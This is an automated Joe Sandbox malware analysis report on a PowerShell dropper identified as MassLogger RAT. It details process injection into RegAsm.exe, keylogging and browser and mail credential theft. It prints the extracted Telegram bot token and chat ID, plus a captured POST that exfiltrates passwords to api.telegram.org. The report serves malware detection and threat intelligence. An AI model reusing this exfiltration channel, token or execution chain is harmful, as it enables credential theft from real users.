Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
foreign.ps1

Overview

General Information

Sample name:foreign.ps1
Analysis ID:1615013
MD5:7fbd0dd0f21baa637b05f5d023d61f60
SHA1:fd4d9e96f9004ca42e1059a437bfc46ceab8d2e0
SHA256:e07a4f21db3fc5195fa7b599ad8082ba0bdc7cd0d443270465a287740aaf281e
Tags:196-251-92-64ps1user-JAMESWT_MHT
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Contains functionality to register a low level keyboard hook
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
PE file has nameless sections
Powershell drops PE file
Suspicious execution chain found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\foreign.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • x.exe (PID: 8140 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: FE308F2EC5C7F2C2C6F414A4F90D7D9F)
      • RegAsm.exe (PID: 8176 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8184 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • notepad.exe (PID: 8080 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\foreign.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7608006233:AAEa3uE2wUISsAxYhX-rxjPoq2_3Ngaphnc", "Telegram Chatid": "7777620258"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
    • 0xb3fb:$a1: get_encryptedPassword
    • 0xb723:$a2: get_encryptedUsername
    • 0xb196:$a3: get_timePasswordChanged
    • 0xb2b7:$a4: get_passwordField
    • 0xb411:$a5: set_encryptedPassword
    • 0xcd5b:$a7: get_logins
    • 0xca0c:$a8: GetOutlookPasswords
    • 0xc7fe:$a9: StartKeylogger
    • 0xccab:$a10: KeyLoggerEventArgs
    • 0xc85b:$a11: KeyLoggerEventArgsEventHandler
    00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
      00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x44a0b:$a1: get_encryptedPassword
      • 0x5603f:$a1: get_encryptedPassword
      • 0x67697:$a1: get_encryptedPassword
      • 0x797bb:$a1: get_encryptedPassword
      • 0x8b83b:$a1: get_encryptedPassword
      • 0x44d33:$a2: get_encryptedUsername
      • 0x56367:$a2: get_encryptedUsername
      • 0x679bf:$a2: get_encryptedUsername
      • 0x79ae3:$a2: get_encryptedUsername
      • 0x8bb63:$a2: get_encryptedUsername
      • 0x447a6:$a3: get_timePasswordChanged
      • 0x55dda:$a3: get_timePasswordChanged
      • 0x67432:$a3: get_timePasswordChanged
      • 0x79556:$a3: get_timePasswordChanged
      • 0x8b5d6:$a3: get_timePasswordChanged
      • 0x448c7:$a4: get_passwordField
      • 0x55efb:$a4: get_passwordField
      • 0x67553:$a4: get_passwordField
      • 0x79677:$a4: get_passwordField
      • 0x8b6f7:$a4: get_passwordField
      • 0x44a21:$a5: set_encryptedPassword
      Process Memory Space: powershell.exe PID: 7856INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x467c7:$b1: ::WriteAllBytes(
      • 0x6401f:$b1: ::WriteAllBytes(
      • 0x467e3:$b2: ::FromBase64String(
      • 0x6403b:$b2: ::FromBase64String(
      • 0xe3a21:$s1: -join
      • 0xf0af6:$s1: -join
      • 0xf3ec8:$s1: -join
      • 0xf457a:$s1: -join
      • 0xf606b:$s1: -join
      • 0xf8271:$s1: -join
      • 0xf8a98:$s1: -join
      • 0xf9308:$s1: -join
      • 0xf9a43:$s1: -join
      • 0xf9a75:$s1: -join
      • 0xf9abd:$s1: -join
      • 0xf9adc:$s1: -join
      • 0xfa32c:$s1: -join
      • 0xfa4a8:$s1: -join
      • 0xfa520:$s1: -join
      • 0xfa5b3:$s1: -join
      • 0xfa819:$s1: -join
      Click to see the 4 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.x.exe.2d0b410.2.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
        4.2.x.exe.2d0b410.2.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x97fb:$a1: get_encryptedPassword
        • 0x9b23:$a2: get_encryptedUsername
        • 0x9596:$a3: get_timePasswordChanged
        • 0x96b7:$a4: get_passwordField
        • 0x9811:$a5: set_encryptedPassword
        • 0xb15b:$a7: get_logins
        • 0xae0c:$a8: GetOutlookPasswords
        • 0xabfe:$a9: StartKeylogger
        • 0xb0ab:$a10: KeyLoggerEventArgs
        • 0xac5b:$a11: KeyLoggerEventArgsEventHandler
        6.2.RegAsm.exe.400000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          6.2.RegAsm.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0xb5fb:$a1: get_encryptedPassword
          • 0xb923:$a2: get_encryptedUsername
          • 0xb396:$a3: get_timePasswordChanged
          • 0xb4b7:$a4: get_passwordField
          • 0xb611:$a5: set_encryptedPassword
          • 0xcf5b:$a7: get_logins
          • 0xcc0c:$a8: GetOutlookPasswords
          • 0xc9fe:$a9: StartKeylogger
          • 0xceab:$a10: KeyLoggerEventArgs
          • 0xca5b:$a11: KeyLoggerEventArgsEventHandler
          4.2.x.exe.2d1ca44.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 9 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\foreign.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\foreign.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\foreign.ps1", ProcessId: 7856, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\foreign.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\foreign.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\foreign.ps1", ProcessId: 7856, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-14T12:24:42.539206+010020577441Malware Command and Control Activity Detected192.168.2.1149770149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-14T12:24:35.534856+010028032742Potentially Bad Traffic192.168.2.1149726132.226.8.16980TCP
            2025-02-14T12:24:41.613024+010028032742Potentially Bad Traffic192.168.2.1149726132.226.8.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-14T12:24:42.252972+010018100081Potentially Bad Traffic192.168.2.1149770149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Found malware configuration
            Source: 00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7608006233:AAEa3uE2wUISsAxYhX-rxjPoq2_3Ngaphnc", "Telegram Chatid": "7777620258"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 87%
            Source: C:\Users\user\AppData\Local\Temp\x.exeVirustotal: Detection: 51%Perma Link
            Multi AV Scanner detection for submitted file
            Source: foreign.ps1Virustotal: Detection: 47%Perma Link
            Source: foreign.ps1ReversingLabs: Detection: 40%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:49732 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49770 version: TLS 1.2
            Source: Binary string: BVZXCH33.pdb source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1311459662.0000000000992000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
            Source: Binary string: BVZXCH33.pdb\f source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1311459662.0000000000992000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 03065782h6_2_03065366
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 030651B9h6_2_03064F08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 03065782h6_2_030656AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 066C037Dh6_2_066C0040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push 00000000h6_2_066CA0F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 066C8A6Dh6_2_066C8890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 066C93F7h6_2_066C8890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 066C79B0h6_2_066C7708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 066C1830h6_2_066C1588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_066CAF06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_066C7D91
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, 000003E8h6_2_07032F68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, 000003E8h6_2_07032F58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push 00000000h6_2_07032C9F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push 00000000h6_2_07032148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]6_2_07032148

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49770 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.11:49770 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7608006233:AAEa3uE2wUISsAxYhX-rxjPoq2_3Ngaphnc/sendDocument?chat_id=7777620258&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd4cc04399cd0aHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49726 -> 132.226.8.169:80
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:49732 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7608006233:AAEa3uE2wUISsAxYhX-rxjPoq2_3Ngaphnc/sendDocument?chat_id=7777620258&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd4cc04399cd0aHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
            Source: RegAsm.exe, 00000006.00000002.3755465000.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: x.exe, 00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000000.00000002.1317146695.0000000005256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1329377219.00000000076B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000000.00000002.1317146695.0000000005101000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000000.00000002.1317146695.0000000005256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1329377219.00000000076B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000000.00000002.1317146695.0000000005101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB_q
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: x.exe, 00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
            Source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000000.00000002.1317146695.0000000005256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1329377219.00000000076B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: x.exe, 00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003200000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49770 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to log keystrokes (.Net Source)
            Source: 4.2.x.exe.2d0b410.2.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
            Source: 4.2.x.exe.2d1ca44.0.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
            Source: 4.2.x.exe.2d2e09c.1.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
            Contains functionality to register a low level keyboard hook
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_06A333A4 SetWindowsHookExA 0000000D,00000000,00000000,?6_2_06A333A4

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 4.2.x.exe.2d0b410.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.x.exe.2d1ca44.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.x.exe.2d2e09c.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.x.exe.2d2e09c.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.x.exe.2d1ca44.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.x.exe.2d0b410.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 7856, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: x.exe PID: 8140, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: RegAsm.exe PID: 8184, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            PE file has nameless sections
            Source: x.exe.0.drStatic PE information: section name:
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02C828D04_2_02C828D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02C808484_2_02C80848
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02C811E04_2_02C811E0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02C828C14_2_02C828C1
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02C807D94_2_02C807D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0306C1686_2_0306C168
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0306A7CC6_2_0306A7CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0306CA586_2_0306CA58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03064F086_2_03064F08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03067E686_2_03067E68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0306C3866_2_0306C386
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0306B9E06_2_0306B9E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03067E596_2_03067E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03064EF86_2_03064EF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03062DD16_2_03062DD1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C06A06_2_066C06A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C00406_2_066C0040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066CA0F86_2_066CA0F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C3F786_2_066C3F78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C4CD86_2_066C4CD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C1A586_2_066C1A58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C88906_2_066C8890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C99806_2_066C9980
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C76F86_2_066C76F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C77086_2_066C7708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C15786_2_066C1578
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C15886_2_066C1588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C00236_2_066C0023
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C7D916_2_066C7D91
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066CE8E86_2_066CE8E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066CE8DA6_2_066CE8DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C88816_2_066C8881
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C99706_2_066C9970
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_06A3B7A86_2_06A3B7A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_07030FC86_2_07030FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_070321486_2_07032148
